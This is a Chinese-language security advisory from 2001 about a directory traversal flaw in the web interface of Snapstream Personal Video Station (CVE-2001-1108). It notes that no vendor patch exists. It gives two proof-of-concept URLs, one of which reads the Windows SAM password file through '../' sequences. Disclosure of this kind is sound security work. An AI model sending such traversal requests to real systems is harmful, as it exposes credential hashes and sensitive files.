发布日期：2001-07-26
更新日期：2001-08-01

受影响系统：

Snapstream Personal Video Station 1.2a

描述：

---

BUGTRAQ  ID: 3100
CVE(CAN) ID: CVE-2001-1108

Snapstream Personal Video Station是Windows平台下的软件，用于在自己的PC机上录
制视频输出，然后在本地或通过HTTP接口观看。Snapstream PVS的Web接口运行在端口
8129上。

发现其存在目录遍历漏洞，攻击者通过“../”就可以访问到Web根目录之外的内容，这
可能导致系统敏感信息的泄露。

<*来源：（john@interrorem.com） *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

（john@interrorem.com）提供了如下测试代码：

http://home.victim.com:8080/../../../../autoexec.bat
http://home.victim.com:8080/../../../winnt/repair/sam


建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.snapstream.com/products/sspvs/Default.htm


浏览次数：5767
严重程度：0（网友投票）